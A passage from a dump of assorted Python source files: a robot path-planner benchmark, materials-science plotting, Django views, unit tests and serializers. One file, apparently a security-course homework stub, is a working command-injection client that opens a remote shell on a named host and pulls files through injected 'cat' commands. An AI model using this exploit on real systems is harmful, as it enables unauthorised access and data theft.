over the PRM computation\n shouldPlot = plotConfigData['shouldPlot']\n\n if(pathLength == None):\n pathLength = 0\n computationTime = 0\n\n if shouldPlot:\n if not pathLength:\n pathLength = np.nan\n title = 'PRM - path length = %0.3g n = %0.3g r = %0.3g' \\\n % (pathLength, n, r)\n plotConfigData['plotTitle'] += title\n self.plot(graph, startState, goalState, plotConfigData,\n routes, path=shortestPath)\n\n # print(\"Path Length\" , pathLength)\n\n return (computationTime, pathLength, foundPath)\n\n def plot(self, graph, startState, goalState,\n plotConfigData, routes, path=None):\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n # plot the graph and its shortest path\n fig, ax = graph.plot(path=path, fig=fig, showLabels=False,\n showEdgeWeights=False)\n\n # unpack dictionary\n plotTitle = plotConfigData['plotTitle']\n xlabel = plotConfigData['xlabel']\n ylabel = plotConfigData['ylabel']\n shouldPlotCSpaceDiscretizationGrid = False\n shouldPlotObstacles = True\n\n\n # plot grid lines BEHIND the data\n ax.set_axisbelow(True)\n\n plt.grid()\n\n # plotting all the obstacles\n if shouldPlotObstacles:\n obstacles = WORKSPACE_CONFIG['WO2']\n for obst in obstacles:\n x,y = obst.exterior.xy\n ax.fill(x,y, alpha=0.5, fc='k',ec='none')\n\n # plotting the robot's motion\n # if robot is not None:\n robotPath = routes\n # robotPath = path\n\n # plotting the robot origin's path through cspace\n x = [state[0] for state in robotPath]\n y = [state[1] for state in robotPath]\n plt.plot(x, y, color='red', marker='*', linestyle='none',\n linewidth=4, markersize=3,\n label='Robot path')\n\n # plotting the start / end location of the robot\n plt.plot(startState[0], startState[1],\n color='green', marker='o', linestyle='none',\n linewidth=2, markersize=16,\n label='Starting State')\n\n plt.plot(goalState[0], goalState[1],\n color='red', marker='x', linestyle='none',\n linewidth=4, markersize=16,\n label='Goal State')\n\n ax.set_aspect('equal')\n plt.title(plotTitle)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n ax.axes.get_xaxis().set_visible(True)\n ax.axes.get_yaxis().set_visible(True)\n ax.set_xlim(self.minBounds[0], self.maxBounds[0])\n ax.set_ylim(self.minBounds[1], self.maxBounds[1])\n fig.legend(loc='upper left')\n\n\ndef savePlot(fig, shouldSavePlots, baseSaveFName, plotTitle,\n useTightLayout=True):\n print(\"Saving fig: \", plotTitle)\n\n if shouldSavePlots:\n saveFName = baseSaveFName + '-' + plotTitle + '.png'\n if useTightLayout:\n plt.tight_layout()\n plt.savefig(saveFName, dpi=500)\n\n print('wrote figure to: ', saveFName)\n # plt.show()\n plt.close(fig)\n\ndef plotStatistics(benchMarkingDF, pathValidityDF, benchParams, baseSaveFName, plotTitle):\n\n print(\"Entering Plotting Stastics\")\n ##\n # Plotting boxplots\n ##\n boxPlotsToMake = ['computationTimeInSeconds', 'pathLength']\n\n # need to create a new, merged categorical data for boxplots\n mergedParamsName = ', '.join(benchParams)\n benchMarkingDF[mergedParamsName] = benchMarkingDF[benchParams].apply(\n lambda x: ', '.join(x.astype(str)), axis=1)\n pathValidityDF[mergedParamsName] = pathValidityDF[\n benchParams].apply(lambda x: ', '.join(x.astype(str)), axis=1)\n\n # Usual boxplot for each variable that was benchmarked\n for plotVar in boxPlotsToMake:\n\n # make it wider for the insanse length of xticklabels\n fig = plt.figure(figsize=(20, 10))\n\n plt.style.use(\"seaborn-darkgrid\")\n bp = sns.boxplot(data=benchMarkingDF,\n x=mergedParamsName, y=plotVar)\n sns.swarmplot(x=mergedParamsName, y=plotVar, data=benchMarkingDF,\n color=\"grey\")\n\n # for readability of axis labels\n bp.set_xticklabels(bp.get_xticklabels(), rotation=45, ha='right')\n\n newPlotTitle = plotVar + '-' + plotTitle\n plt.title('Benchmarking of Sampled Planner ' + plotVar)\n savePlot(fig=fig, shouldSavePlots=True,\n baseSaveFName=baseSaveFName, plotTitle=newPlotTitle)\n\n # number of times a valid path was found\n fig = plt.figure()\n\n plt.style.use('seaborn-darkgrid')\n bp = sns.barplot(x=mergedParamsName, y='numValidPaths',\n data=pathValidityDF)\n plt.title('Number of Valid Paths Found for Each Parameter Combination')\n\n # for readability of axis labels\n bp.set_xticklabels(bp.get_xticklabels(), rotation=45, ha='right')\n\n newPlotTitle = 'numPaths' + '-' + plotTitle\n savePlot(fig=fig, shouldSavePlots=True,\n baseSaveFName=baseSaveFName, plotTitle=newPlotTitle)\n\ndef main():\n print(\" Config Files need to be updated for different results \")\n val = input(\" Enter 0 for Defualt Single setup or 1 for Benchmarking: \")\n val = int(val)\n\n if val == 0:\n name = 'prm_w02_backup.yaml'\n with open('prm_w02_backup.yaml', 'r') as stream:\n configData = yaml.load(stream, Loader=yaml.Loader)\n \n # prm = PRM()\n \n numRunsOfPlannerPerSetting = configData['numRunsOfPlannerPerSetting']\n parametersToVary = configData['paramterNamesToVary']\n allParams = dict((var, configData[var]) for var in parametersToVary)\n print(allParams)\n\n keys, values = zip(*allParams.items())\n experiments = [dict(zip(keys, v)) for v in itertools.product(*values)]\n print(experiments)\n data = []\n pathValidityData = []\n\n print(\"Running Experimenents\")\n print(experiments)\n\n for experiment in experiments:\n print(\"Currently Running Experiment\")\n print(experiment)\n prm = None\n prm = PRM(name=name, n=experiment['n'], r=experiment['r'], smoothing=experiment['smoothing'])\n plotConfigData = {'shouldPlot': True,\n 'plotTitle': '',\n 'xlabel': 'x',\n 'ylabel': 'y',\n 'plotObstacles': True,\n 'plotGrid': False}\n print(experiment)\n numValidPaths = 1\n runInfo = {}\n\n for idx, i in enumerate(range(0, numRunsOfPlannerPerSetting)):\n print(idx)\n (computationTime,\n pathLength,\n fp) = prm.findPathToGoal(startState=configData['startState'],\n goalState=configData['goalState'],\n plotConfigData=plotConfigData,\n plannerConfigData=experiment,\n shouldBenchmark=True)\n\n plt.show()\n\n elif val == 1:\n name = 'prm_w02.yaml'\n with open('prm_w02.yaml', 'r') as stream:\n configData = yaml.load(stream, Loader=yaml.Loader)\n \n # prm = PRM()\n \n numRunsOfPlannerPerSetting = configData['numRunsOfPlannerPerSetting']\n parametersToVary = configData['paramterNamesToVary']\n allParams = dict((var, configData[var]) for var in parametersToVary)\n print(allParams)\n\n keys, values = zip(*allParams.items())\n experiments = [dict(zip(keys, v)) for v in itertools.product(*values)]\n print(experiments)\n data = []\n pathValidityData = []\n\n print(\"Running Experimenents\")\n print(experiments)\n\n for experiment in experiments:\n print(\"Currently Running Experiment\")\n print(experiment)\n prm = None\n prm = PRM(name=name, n=experiment['n'], r=experiment['r'], smoothing=experiment['smoothing'])\n plotConfigData = {'shouldPlot': True,\n 'plotTitle': '',\n 'xlabel': 'x',\n 'ylabel': 'y',\n 'plotObstacles': True,\n 'plotGrid': False}\n print(experiment)\n numValidPaths = 1\n runInfo = {}\n\n for idx, i in enumerate(range(0, numRunsOfPlannerPerSetting)):\n print(idx)\n (computationTime,\n pathLength,\n fp) = prm.findPathToGoal(startState=configData['startState'],\n goalState=configData['goalState'],\n plotConfigData=plotConfigData,\n plannerConfigData=experiment,\n shouldBenchmark=True)\n\n # dat = None\n dat = {'computationTimeInSeconds': computationTime, 'pathLength': pathLength}\n # bencmarkingInfo = None \n # fp = None\n bencmarkingInfo = {**dat, **experiment}\n # benchmarkingInfo = None \n # foundPath = None \n (benchmarkingInfo, foundPath) = (bencmarkingInfo, fp)\n print(foundPath)\n \n benchmarkingInfo.update(experiment)\n data.append(benchmarkingInfo)\n\n # print(foundPath)\n\n if foundPath:\n numValidPaths += 1\n\n\n \n runInfo['numValidPaths'] = copy.deepcopy(numValidPaths)\n runInfo['numTimesRun'] = numRunsOfPlannerPerSetting\n runInfo.update(copy.deepcopy(experiment))\n pathValidityData.append(runInfo)\n\n print(runInfo)\n\n\n benchMarkingDF = pd.DataFrame(data)\n pathValidityDF = pd.DataFrame(pathValidityData)\n\n benchMarkingDF.to_csv('/home/arpit/studies/motion/Assignment4/benchMarkingDF.csv',header=True)\n pathValidityDF.to_csv('/home/arpit/studies/motion/Assignment4/pathValidityDF.csv',header=True)\n\n (benchMarkingDF, pathValidityDF, benchParams) = (benchMarkingDF, pathValidityDF, parametersToVary)\n\n plotTitle = 'PRM' + '_stats'\n\n my_path = os.path.abspath(__file__) + '\\plots'\n\n plotStatistics(benchMarkingDF=benchMarkingDF,\n pathValidityDF=pathValidityDF,\n benchParams=benchParams,\n baseSaveFName=my_path,\n plotTitle=plotTitle)\n\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"RRT_and_PRM/Code/code/prm_WO2.py","file_name":"prm_WO2.py","file_ext":"py","file_size_in_byte":21527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"164743022","text":"# Here, we will analyze the DOS of 14 1 11 for different basis sets\nfrom pathlib import Path\n#relevant classes\nfrom pymatgen.io.lobster import Doscar\nfrom pymatgen.electronic_structure.plotter import DosPlotter\nfrom pymatgen.core.composition import Element\n\n# elementwise density of states\n\nfor spin in [\"Spin_2\", \"Spin_mixed\"]:\n for lobster in [\"lobster_0\", \"lobster_1\"]:\n directory = (\n Path(__file__).parent.parent / f\"Results/Yb14MnSb11/mp-568088/{spin}/{lobster}\"\n )\n # read in DOSCAR.lobster\n doscar = Doscar(doscar=directory/\"DOSCAR.lobster.gz\", structure_file=directory/\"POSCAR.gz\")\n complete_dos = doscar.completedos\n # get structure object\n structure = complete_dos.structure\n Plotter = DosPlotter()\n el = Element(\"Mn\")\n Plotter.add_dos_dict(complete_dos.get_element_spd_dos(el=el))\n Plotter.get_plot().show()\n\n","sub_path":"Analysis_Scripts/analyze_results_14_1_11_DOS_Mn.py","file_name":"analyze_results_14_1_11_DOS_Mn.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"154884556","text":"from django.shortcuts import render, redirect\nfrom .models import Album\nfrom django.contrib import messages\nfrom .forms import AlbumCreateForm\n\n\ndef album(request):\n albums = Album.objects.all()\n top_albums = Album.objects.filter(is_top=True)\n return render(request,\"album/album.html\", { \"albums\":albums, \n \"top_albums\":top_albums })\n \n \n# Редактирование альбома\ndef edit_album(request, pk):\n album = Album.objects.get(id=pk)\n \n form = AlbumCreateForm(instance=album)\n \n if request.user.is_authenticated():\n if request.method == \"POST\":\n form = AlbumCreateForm(request.POST, request.FILES, instance=album)\n \n if form.is_valid():\n form.save() \n return redirect('album:album') \n else:\n form = AlbumCreateForm()\n return render(request, \"album/album_edit.html\", {'form': form, 'album':album})\n \n \n#Добавление альбома\ndef add_album(request): \n \n if request.method == \"POST\":\n form = AlbumCreateForm(request.POST, request.FILES)\n \n if form.is_valid():\n instance = form.save()\n messages.success(request, \"Saved\")\n return redirect('album:album')\n else:\n messages.error(request, 'No success!.') \n \n else:\n form = AlbumCreateForm()\n return render(request, \"album/album_add.html\", {'form': form})\t \n \t\n \n#Удаление альбома\ndef album_delete(request, pk):\n instance = Album.objects.get(id=pk)\n if request.method == \"POST\": \n instance.delete()\n messages.success(request, \"DELETED\")\n return redirect (\"album:album\")\n return render(request, \"album/album_delete.html\", {'instance':instance})\n \n#Удалить из топа \ndef remove_top(request):\n if request.method==\"POST\":\n pk = request.POST.get('pk')\n album = Album.objects.get(pk=pk)\n album.untop()\n return redirect (\"album:album\")\n \n#Добавить в топ \ndef add_to_top(request):\n if request.method==\"POST\":\n pk = request.POST.get('pk')\n album = Album.objects.get(pk=pk)\n album.addtop()\n return redirect (\"album:album\")\n \n#Анонс \ndef add_cover(request):\n if request.method==\"POST\":\n pk = request.POST.get('pk')\n album = Album.objects.get(id=pk)\n album.anounce()\n return redirect (\"album:album\")\n\n","sub_path":"album/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"571637855","text":"\"\"\"\nClass to make an inference using the trained model.\n\"\"\"\nfrom sklearn.externals import joblib\nimport sys\nfrom sklearn import preprocessing\nimport numpy as np\n\nclass Inference:\n def __init__(self):\n self.regions = [\"US\", \"Latin_America\", \"Europe\", \"Asia\", \"South_America\"]\n self.sentiments = [\"happy\", \"sad\", \"neutral\"]\n self.dayTimes = [\"morning\", \"afternoon\", \"night\"]\n self.brands = [\"Fanta\", \"Coke\", \"Coke_Zero\", \"Diet_Coke\", \"Smart_Water\", \"Minute_Made\", \"Sobe\", \"Mineral_Water\",\n \"Sprite\"]\n \n # Instantiate Label Encoders\n self.regions_le = preprocessing.LabelEncoder().fit(self.regions)\n self.sentiments_le = preprocessing.LabelEncoder().fit(self.sentiments)\n self.dayTimes_le = preprocessing.LabelEncoder().fit(self.dayTimes)\n self.brands_le = preprocessing.LabelEncoder().fit(self.brands)\n \n # Load classifier\n self.clf = joblib.load(filename='clf.pkl')\n \n def infer(self, region, brand, text_len, sentiment, has_photo, has_vid, vid_len, dayTime):\n \n print('\\n\\nPredicting performance...')\n region = list(self.regions_le.transform(region))[0]\n brand = list(self.brands_le.transform(brand))[0]\n sentiment = list(self.sentiments_le.transform(sentiment))[0]\n tod = list(self.dayTimes_le.transform(dayTime))[0]\n array = np.array([region, brand, text_len[0], sentiment, has_photo[0], has_vid[0], vid_len[0], tod]).reshape(1, -1)\n pred = self.clf.predict(array)\n print(\"The model predicts {} likes!\".format(pred[0]), '\\n\\n')\n \nif __name__ == '__main__':\n inf = Inference()\n region = np.array([sys.argv[1]])\n brand = np.array([sys.argv[2]])\n text_len = np.array([sys.argv[3]])\n sentiment = np.array([sys.argv[4]])\n has_photo = np.array([sys.argv[5]])\n has_vid = np.array([sys.argv[6]])\n vid_len = np.array([sys.argv[7]])\n tod = np.array([sys.argv[8]])\n inf.infer(region,\n brand, text_len, sentiment, has_photo, has_vid, vid_len, tod)\n \n \n","sub_path":"Inference.py","file_name":"Inference.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"271370441","text":"#!/usr/bin/env python\n# Copyright 2016-2017 IBM Corp. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nUnit tests for _nic module.\n\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport unittest\nimport requests_mock\n\nfrom zhmcclient import Session, Client, Nic\n\n\nclass NicTests(unittest.TestCase):\n \"\"\"All tests for Nic and NicManager classes.\"\"\"\n\n def setUp(self):\n self.session = Session('test-dpm-host', 'test-user', 'test-id')\n self.client = Client(self.session)\n with requests_mock.mock() as m:\n # Because logon is deferred until needed, we perform it\n # explicitly in order to keep mocking in the actual test simple.\n m.post('/api/sessions', json={'api-session': 'test-session-id'})\n self.session.logon()\n\n self.cpc_mgr = self.client.cpcs\n with requests_mock.mock() as m:\n result = {\n 'cpcs': [\n {\n 'object-uri': '/api/cpcs/fake-cpc-id-1',\n 'name': 'CPC1',\n 'status': '',\n }\n ]\n }\n m.get('/api/cpcs', json=result)\n# self.cpc = self.cpc_mgr.find(name=\"CPC1\", full_properties=False)\n cpcs = self.cpc_mgr.list()\n self.cpc = cpcs[0]\n\n partition_mgr = self.cpc.partitions\n with requests_mock.mock() as m:\n result = {\n 'partitions': [\n {\n 'status': 'active',\n 'object-uri': '/api/partitions/fake-part-id-1',\n 'name': 'PART1'\n },\n {\n 'status': 'stopped',\n 'object-uri': '/api/partitions/fake-part-id-2',\n 'name': 'PART2'\n }\n ]\n }\n\n m.get('/api/cpcs/fake-cpc-id-1/partitions', json=result)\n\n mock_result_part1 = {\n 'status': 'active',\n 'object-uri': '/api/partitions/fake-part-id-1',\n 'name': 'PART1',\n 'description': 'Test Partition',\n 'more_properties': 'bliblablub',\n 'nic-uris': [\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-2'\n ]\n }\n m.get('/api/partitions/fake-part-id-1',\n json=mock_result_part1)\n mock_result_part2 = {\n 'status': 'stopped',\n 'object-uri': '/api/partitions/fake-lpar-id-2',\n 'name': 'PART2',\n 'description': 'Test Partition',\n 'more_properties': 'bliblablub',\n 'nic-uris': [\n '/api/partitions/fake-part-id-2/nics/fake-nic-id-4',\n '/api/partitions/fake-part-id-2/nics/fake-nic-id-6'\n ]\n }\n m.get('/api/partitions/fake-part-id-2',\n json=mock_result_part2)\n\n partitions = partition_mgr.list(full_properties=True)\n self.partition = partitions[0]\n\n def tearDown(self):\n with requests_mock.mock() as m:\n m.delete('/api/sessions/this-session', status_code=204)\n self.session.logoff()\n\n def test_init(self):\n \"\"\"Test __init__() on NicManager instance in Partition.\"\"\"\n nic_mgr = self.partition.nics\n self.assertEqual(nic_mgr.partition, self.partition)\n\n def test_list_short_ok(self):\n \"\"\"\n Test successful list() with short set of properties on\n NicManager instance in partition.\n \"\"\"\n nic_mgr = self.partition.nics\n nics = nic_mgr.list(full_properties=False)\n\n self.assertEqual(len(nics), len(self.partition.properties['nic-uris']))\n for idx, nic in enumerate(nics):\n self.assertEqual(\n nic.properties['element-uri'],\n self.partition.properties['nic-uris'][idx])\n self.assertEqual(\n nic.uri,\n self.partition.properties['nic-uris'][idx])\n self.assertFalse(nic.full_properties)\n self.assertEqual(nic.manager, nic_mgr)\n\n def test_list_full_ok(self):\n \"\"\"\n Test successful list() with full set of properties on\n NicManager instance in partition.\n \"\"\"\n nic_mgr = self.partition.nics\n\n with requests_mock.mock() as m:\n\n mock_result_nic1 = {\n 'parent': '/api/partitions/fake-part-id-1',\n 'name': 'nic1',\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n 'class': 'nic',\n 'element-id': 'fake-nic-id-1',\n 'type': 'osd',\n 'description': '',\n 'more_properties': 'bliblablub'\n }\n m.get('/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n json=mock_result_nic1)\n mock_result_nic2 = {\n 'parent': '/api/partitions/fake-part-id-1',\n 'name': 'nic2',\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-2',\n 'class': 'nic',\n 'element-id': 'fake-nic-id-2',\n 'type': 'osd',\n 'description': '',\n 'more_properties': 'bliblablub'\n }\n m.get('/api/partitions/fake-part-id-1/nics/fake-nic-id-2',\n json=mock_result_nic2)\n\n nics = nic_mgr.list(full_properties=True)\n\n self.assertEqual(\n len(nics),\n len(self.partition.properties['nic-uris']))\n for idx, nic in enumerate(nics):\n self.assertEqual(\n nic.properties['element-uri'],\n self.partition.properties['nic-uris'][idx])\n self.assertEqual(\n nic.uri,\n self.partition.properties['nic-uris'][idx])\n self.assertTrue(nic.full_properties)\n self.assertEqual(nic.manager, nic_mgr)\n\n def test_list_filter_name_ok(self):\n \"\"\"\n Test successful list() with filter arguments using the 'name' property\n on a NicManager instance in a partition.\n \"\"\"\n nic_mgr = self.partition.nics\n\n with requests_mock.mock() as m:\n\n mock_result_nic1 = {\n 'parent': '/api/partitions/fake-part-id-1',\n 'name': 'nic1',\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n 'class': 'nic',\n 'element-id': 'fake-nic-id-1',\n 'type': 'osd',\n 'description': '',\n 'more_properties': 'bliblablub'\n }\n m.get('/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n json=mock_result_nic1)\n mock_result_nic2 = {\n 'parent': '/api/partitions/fake-part-id-1',\n 'name': 'nic2',\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-2',\n 'class': 'nic',\n 'element-id': 'fake-nic-id-2',\n 'type': 'osd',\n 'description': '',\n 'more_properties': 'bliblablub'\n }\n m.get('/api/partitions/fake-part-id-1/nics/fake-nic-id-2',\n json=mock_result_nic2)\n\n filter_args = {'name': 'nic2'}\n nics = nic_mgr.list(filter_args=filter_args)\n\n self.assertEqual(len(nics), 1)\n nic = nics[0]\n self.assertEqual(nic.name, 'nic2')\n self.assertEqual(\n nic.uri,\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-2')\n self.assertEqual(nic.properties['name'], 'nic2')\n self.assertEqual(nic.properties['element-id'], 'fake-nic-id-2')\n self.assertEqual(nic.manager, nic_mgr)\n\n def test_list_filter_elementid_ok(self):\n \"\"\"\n Test successful list() with filter arguments using the 'element-id'\n property on a NicManager instance in a partition.\n \"\"\"\n nic_mgr = self.partition.nics\n\n with requests_mock.mock() as m:\n\n mock_result_nic1 = {\n 'parent': '/api/partitions/fake-part-id-1',\n 'name': 'nic1',\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n 'class': 'nic',\n 'element-id': 'fake-nic-id-1',\n 'type': 'osd',\n 'description': '',\n 'more_properties': 'bliblablub'\n }\n m.get('/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n json=mock_result_nic1)\n mock_result_nic2 = {\n 'parent': '/api/partitions/fake-part-id-1',\n 'name': 'nic2',\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-2',\n 'class': 'nic',\n 'element-id': 'fake-nic-id-2',\n 'type': 'osd',\n 'description': '',\n 'more_properties': 'bliblablub'\n }\n m.get('/api/partitions/fake-part-id-1/nics/fake-nic-id-2',\n json=mock_result_nic2)\n\n filter_args = {'element-id': 'fake-nic-id-2'}\n nics = nic_mgr.list(filter_args=filter_args)\n\n self.assertEqual(len(nics), 1)\n nic = nics[0]\n self.assertEqual(nic.name, 'nic2')\n self.assertEqual(\n nic.uri,\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-2')\n self.assertEqual(nic.properties['name'], 'nic2')\n self.assertEqual(nic.properties['element-id'], 'fake-nic-id-2')\n self.assertEqual(nic.manager, nic_mgr)\n\n def test_create(self):\n \"\"\"\n This tests the 'Create NIC' operation.\n \"\"\"\n nic_mgr = self.partition.nics\n with requests_mock.mock() as m:\n result = {\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-1'\n }\n m.post('/api/partitions/fake-part-id-1/nics', json=result)\n\n nic = nic_mgr.create(properties={})\n\n self.assertTrue(isinstance(nic, Nic))\n self.assertEqual(nic.properties, result)\n self.assertEqual(nic.uri, result['element-uri'])\n\n def test_delete(self):\n \"\"\"\n This tests the 'Delete NIC' operation.\n \"\"\"\n nic_mgr = self.partition.nics\n nics = nic_mgr.list(full_properties=False)\n nic = nics[0]\n with requests_mock.mock() as m:\n m.delete('/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n status_code=204)\n nic.delete()\n\n def test_update_properties(self):\n \"\"\"\n This tests the 'Update NIC Properties' operation.\n \"\"\"\n nic_mgr = self.partition.nics\n nics = nic_mgr.list(full_properties=False)\n nic = nics[0]\n with requests_mock.mock() as m:\n m.post('/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n status_code=204)\n nic.update_properties(properties={})\n\n def test_nic_object(self):\n \"\"\"\n This tests the `nic_object()` method.\n \"\"\"\n nic_mgr = self.partition.nics\n nic_id = 'fake-nic-id0711'\n\n nic = nic_mgr.nic_object(nic_id)\n\n nic_uri = self.partition.uri + \"/nics/\" + nic_id\n\n self.assertTrue(isinstance(nic, Nic))\n self.assertEqual(nic.uri, nic_uri)\n self.assertEqual(nic.properties['element-uri'], nic_uri)\n self.assertEqual(nic.properties['element-id'], nic_id)\n self.assertEqual(nic.properties['class'], 'nic')\n self.assertEqual(nic.properties['parent'], self.partition.uri)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/unit/test_nic.py","file_name":"test_nic.py","file_ext":"py","file_size_in_byte":12684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"399458822","text":"\"\"\"\n Use the same techniques such as (but not limited to):\n 1) Sockets\n 2) File I/O\n 3) raw_input()\n\n from the OSINT HW to complete this assignment. Good luck!\n\"\"\"\n\nimport socket\nimport re\nimport time\n\nhost = \"cornerstoneairlines.co\" # IP address here\nport = 45 # Port here\n\ndef execute_cmd(cmd):\n \"\"\"\n Sockets: https://docs.python.org/2/library/socket.html\n How to use the socket s:\n\n # Establish socket connection\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n\n Reading:\n\n data = s.recv(1024) # Receives 1024 bytes from IP/Port\n print(data) # Prints data\n\n Sending:\n\n s.send(\"something to send\\n\") # Send a newline \\n at the end of your command\n \"\"\"\n regex = re.match('^\\s*(\\w*)\\s*([A-Za-z0-9.\\/\\-\\_]*)\\s*([A-Za-z0-9.\\/\\-\\_]*)\\s*$', cmd)\n val = regex.group(1)\n# print('val: %s' % val)\n if val == 'shell':\n path = '/'\n while True:\n usr_in = raw_input(path + \">\")\n if usr_in == 'exit':\n break\n command = ';' + ' cd ' + path + '; ' + usr_in\n if ('cd' in usr_in):\n# print('here')\n reg = re.match('^\\s*cd\\s*([A-Za-z0-9.\\/\\-\\_]*)\\s*$', usr_in)\n if (reg.group(1) == ''):\n path = '/'\n elif (reg.group(1)[0] == '/'):\n path = reg.group(1)\n else:\n path += reg.group(1)\n if (path[-1] != '/'):\n path += '/'\n# print('command: \"%s\"' % command)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n data = s.recv(1024)\n time.sleep(2)\n# print('%s' % data)\n s.send(command + '\\n')\n time.sleep(2)\n# print('\"%s\" sent' % command)\n data = s.recv(1024)\n print('%s' % data)\n s.close()\n elif val == 'pull':\n command = '; ' + 'cat ' + regex.group(2)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n data = s.recv(1024)\n time.sleep(2)\n s.send(command + '\\n')\n time.sleep(2)\n# print('\"%s\" sent' % command)\n data = s.recv(1024)\n# print('%s' % data)\n s.close()\n f = open(regex.group(3), 'w')\n f.write(data)\n f.close()\n elif val == 'quit':\n return -1\n elif val == 'help':\n print('shell - Drop into an interactive shell - exit with \"exit\"')\n print('pull - download files')\n print('help - show the help menu')\n print('quit - quit this program')\n else:\n print('invalid command')\n\n return 0\n\n\n\n\nif __name__ == '__main__':\n while True:\n cmd = raw_input('>')\n if execute_cmd(cmd) == -1:\n break\n\n\n","sub_path":"week/4/writeup/stub.py","file_name":"stub.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"389005838","text":"# -*- coding: utf-8 -*-\n\"\"\"\nthis script splits the execution into peaces.\n\ninput: (pjt_name)_tc.csv\noutput: process(num).csv\n\"\"\"\n\nimport sys\nimport subprocess\nimport os\n\ndef file_divider(pjt_name, start, end):\n cmd = 'sed -n -e ' + str(start) +',' + str(end) + 'p ' + pjt_name + '_tc.csv'\n result = subprocess.check_output(cmd, shell=True)\n f = open(\"tmp\" + str(end) + \".csv\", \"w\")\n f.write(result)\n f.close()\n cmd = 'mkdir process' + str(end)\n os.system(cmd)\n cmd = 'cp *.py process' + str(end)\n os.system(cmd)\n cmd = 'cp *.txt process' + str(end)\n os.system(cmd)\n cmd = 'cp *.csv process' + str(end)\n os.system(cmd)\n os.chdir('./process' + str(end))\n cmd = 'rm ' + pjt_name + '_tc.csv'\n os.system(cmd)\n cmd = 'mv tmp' + str(end) + '.csv ' + pjt_name + '_tc.csv'\n os.system(cmd)\n os.chdir('..')\n os.system(\"rm tmp*.csv\")\n return\n\nargvs = sys.argv\npjt_name = argvs[1]\ncmd = 'cat ' + pjt_name + '_tc.csv | wc -l'\nnum = subprocess.check_output(cmd, shell=True)\nnum = num.replace(\" \", \"\")\nnum = num.replace(\"\\n\", \"\")\nfor x in range(int(num) + 1):\n if x % 1000 == 0:\n if x == 0:\n start = x + 1\n else:\n end = x\n file_divider(pjt_name, start, end)\n start = end + 1\nif start < int(num):\n end = int(num)\n file_divider(pjt_name, start, end)\n","sub_path":"change_history_view/change_history_view_import/file_divider.py","file_name":"file_divider.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"200784589","text":"from rest_framework import serializers\nfrom editor.models import Article, ArticleSet, Assignment\nfrom user_profile.models import Section, User\nfrom django.contrib.auth import get_user_model\n\n\nclass ArticleSetSerializer(serializers.ModelSerializer):\n class Meta:\n model = ArticleSet\n fields = '__all__'\n\n\nclass AssignmentSerializer(serializers.ModelSerializer):\n class Meta:\n model = Assignment\n fields = ('assigned_to',)\n\n\nclass ArticleSerializer(serializers.ModelSerializer):\n parent = ArticleSetSerializer(many=False)\n slug = serializers.StringRelatedField(\n many=False,\n read_only=True,\n source='parent'\n )\n assignments = AssignmentSerializer(many=True)\n # section = serializers.PrimaryKeyRelatedField(\n # many=False, read_only=True, source='parent.section')\n\n class Meta:\n model = Article\n fields = '__all__'\n\n def update(self, instance, validated_data):\n print(\"INSIDE UPDATE\")\n print(instance)\n print(validated_data)\n parent_data = validated_data.pop('parent')\n try:\n parent = instance.parent\n except DoesNotExist:\n return None\n\n # Simple fields\n instance.is_locked = validated_data.get(\n 'is_locked', instance.is_locked)\n instance.is_in_copy = validated_data.get(\n 'is_in_copy', instance.is_in_copy)\n instance.is_copy_edited = validated_data.get(\n 'is_copy_edited', instance.is_copy_edited)\n instance.is_breaking = validated_data.get(\n 'is_breaking', instance.is_breaking)\n instance.published = validated_data.get(\n 'published', instance.published)\n instance.go_live_at = validated_data.get(\n 'go_live_at', instance.go_live_at)\n instance.publish_attempts = validated_data.get(\n 'publish_attempts', instance.publish_attempts)\n \n # 